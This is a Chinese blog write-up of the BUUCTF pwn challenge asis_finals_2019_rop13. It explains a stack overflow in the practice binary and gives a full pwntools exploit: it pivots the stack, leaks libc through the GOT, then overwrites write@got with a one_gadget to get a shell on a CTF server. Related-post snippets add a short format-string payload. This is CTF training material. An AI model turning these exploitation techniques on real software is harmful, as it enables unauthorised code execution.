[BUUCTF-pwn] asis_finals_2019_rop13

最新推荐文章于 2024-06-01 10:35:00 发布
最新推荐文章于 2024-06-01 10:35:00 发布
阅读量165 收藏
点赞数 1
分类专栏: CTF pwn 文章标签: python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/121701668
版权

 一道小题整了好久

pie没打开,got表也可以写

程序内容很少

.text:0000000000400481 sub_400481      proc near               ; CODE XREF: start+A↑p
.text:0000000000400481
.text:0000000000400481 buf             = byte ptr -40h
.text:0000000000400481
.text:0000000000400481                 push    rbp
.text:0000000000400482                 mov     rbp, rsp
.text:0000000000400485                 sub     rsp, 40h
.text:0000000000400489                 mov     edx, 100h       ; nbytes
.text:000000000040048E                 lea     rsi, [rbp+buf]  ; buf
.text:0000000000400492                 mov     edi, 0          ; fd
.text:0000000000400497                 call    _read
.text:000000000040049C                 lea     rdi, [rbp+buf]
.text:00000000004004A0                 mov     rdx, rax
.text:00000000004004A3                 call    sub_40044F
.text:00000000004004A8                 lea     rsi, [rbp+buf]  ; buf
.text:00000000004004AC                 mov     edi, 1          ; fd
.text:00000000004004B1                 call    _write
.text:00000000004004B6                 leave
.text:00000000004004B7                 retn
.text:00000000004004B7 sub_400481      endp

先读0x100到rbp-0x40,显然有溢出,然后用函数处理一下(就是字母前一半移到后一半,后一半移到前一半)然后把写的东西输出。

思路:

  1. 在got表的signal这个位置作为buf直接调用后边write这一段可以输入got表得到libc
  2. 但是输出后got.signal+40这个地得有个rbp+ret,所以要提前移到这个后边预写上
  3. 预写的这段要移栈到got.write+40,这样下回就可以修改got表将write写成one_gadget

这里第1次写0x6010a8(a0的位置有占用,只能到a8,实际到在b0-1的位置(利用前边的0绕过函数修改)写输出got表后的返回移栈和ret 

第2次栈已经移到0x6010a8,在0x601068的位置写 \0*7 + 0x601100(到一个空白区域)+ rbp:0x601070-1 + 0x40049c(只有写没有读,leave ret时用的前边写入的值)

第3次移栈到got.write+0x40-1准备下次修改got表

修改got表里的write为one[1]

完整exp:

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
    libc_start_main_ret = 0x21a87
else:
    p = remote('node4.buuoj.cn', 29711) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
    libc_start_main_ret = 0x21b97

context.log_level = 'debug'

#0x601030 elf.got['signal']
#1,move stack 0x601068 +0x40 
rop = flat(b'\x00'*0x40,0x6010a8, 0x400489)
p.send(rop.ljust(0x100, b'\x00'))
p.recv(0x100)

#2, wrtie rop2.rbp,rop2.ret 0x601100,0x400489:read_write  rop1.rbp,ret signal-1:0x601030+40-1, 0x40049c:write
rop = b'\x00'*7 + p64(0x601100) + p64(0x400489) + b'\x00'*0x29
rop+= flat(0x601030 + 0x40 -1, 0x40049c)
p.send(rop.ljust(0x100, b'\x00'))
p.recv(0x100) #
libc_base = u64(p.recv(0x100)[1:9]) - libc_elf.sym['signal']
one_gadget = libc_base + one[1]
print("libc:", hex(libc_base))

#gdb.attach(p, 'b*0x4004b6')

#3, move stack got.write +0x40-1 
rop = flat(b'\x00'*0x40, 0x601057, 0x400489)
p.send(rop.ljust(0x100, b'\x00'))
p.recv(0x100)

#4, got.write->one_gadget
p.send(b'\x00'+ p64(one_gadget))

p.sendline(b'cat flag')
p.interactive()

这里有几个小坑:

一是检查函数会改内容,所以第1字符要设为0绕过检查

二是由于移栈都是改的rbp,没办法改rsp在写system(/bin/sh)时会出错,只能改got表,等运行到write的时候执行one_gadget

石氏是时试
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn rip
weixin_55190422的博客
11-03 293
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 784
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 379
buuctf-pwn 001-016题wp
buuctf jarvisoj_fm
carol2358的博客
05-04 210
先运行, AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位,然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...
[BUUCTF]PWN——oneshot_tjctf_2016(one_gadget)
mcmuyanga的博客
02-01 795
oneshot_tjctf_2016 附件 步骤 例行检查,64位程序,开启了nx 本地试运行一下看看大概的情况 64位ida载入
BUUCTF - PWN】test_your_nc
古月浪子的博客
03-19 1857
只要连上就能有flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' io=remote('xxx',xxx) io.interactive() 附件:test_your_nc ...
[BUUCTF]PWN——picoctf_2018_buffer overflow 0
mcmuyanga的博客
03-09 424
picoctf_2018_buffer overflow 0 附件 步骤 例行检查,32位程序,开启了nx保护 提示要ssh链接 ssh连上后稍微尝试了一下,好像vuln这个程序能读出flag 32为ida载入测试文件 百度一下signal,得知11是(SIGSEGV),对存储的无效访问的信号。 15行的意思是设置了一个函数sigsegv_handler来处理当程序产生对存储的无效访问。 就是说当程序造成无效内存访问的时候,就会输出flag。 在往下看vuln函数 将src拷贝到dest中,
buuctf [Black Watch 入群题]PWN
qq_42728977的博客
04-10 635
本来想着栈溢出简简单单,然后发现竟然没见过这知识点,堆迁移。 看雪链接
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
[BUUCTF]PWN——judgement_mna_2016(32位fmt)
mcmuyanga的博客
03-18 430
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的位置,算一下偏移就能够打印出flag 先找一下输入点参数在栈上的位置 可以看到在oxffffcf4c,然后看一下栈上的布局 发现在距离我们输入的数据的偏移为28和32处存放着flag,定位偏移到该处即可 这题根本不用写exp,但为了水长度,贴一下吧 from pwn import * conte
[BUUCTF-pwn]——jarvisoj_level1
Y_peak的博客
03-17 393
[BUUCTF-pwn]——jarvisoj_level1 题目地址:https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E
BUUCTF-Pwn-ciscn_2019_en_2
餐桌上的猫
03-04 116
题目截图
BUUCTF pwn Xp0intCTF_2018_bof
stareforever的博客
01-11 8758
查看程序保护 保护基本都没开 IDA打开查看程序流程 读入0x18个字符,NAME位置在bss段 然后程序进入到fun1函数,有明显的栈溢出漏洞,溢出长度为0x10,正好可以控制返回地址 主要思想:基本保护都没开,那么可以先在NAME处读入shellcode。后面进入到fun1函数里,利用栈溢出控制程序返回到NAME处 这里shellcode长度最多为0x18 那么可以用 shellcode=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56
[BUUCTF]PWN10——[第五空间2019 决赛]PWN5
mcmuyanga的博客
08-27 1219
[第五空间2019 决赛]PWN5 题目网址:https://buuoj.cn/challenges#[第五空间2019%20决赛]PWN5 步骤: 例行检查,32位,开启了nx和canary(栈保护) nc一下,看看程序大概的执行情况,可以看到当输入的长度过长的时候,他的回显会有点问题,猜测输出语句存在问题 32位ida载入,shift+f12查看一下程序里的字符串,看到了 /bin/sh 双击跟进,ctrl+x找到调用这个字符串的函数 关于格式化字符串详细的讲解,看这里 看文章感觉还是不是很
专属编程笔记
最新发布
u014397365的博客
06-01 1062
在软件开发中,Utils(或Utilities)目录通常用于存放一些。这些工具类或函数为整个应用程序或多个模块提供便利的功能支持,使得代码更加模块化、易于维护和重用。UtilsUtils目录的设计目的在于避免代码重复,并确保在整个项目中以一致的方式处理共通任务。这样做可以提高开发效率,降低维护成本,并确保代码的整洁性和可读性。
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值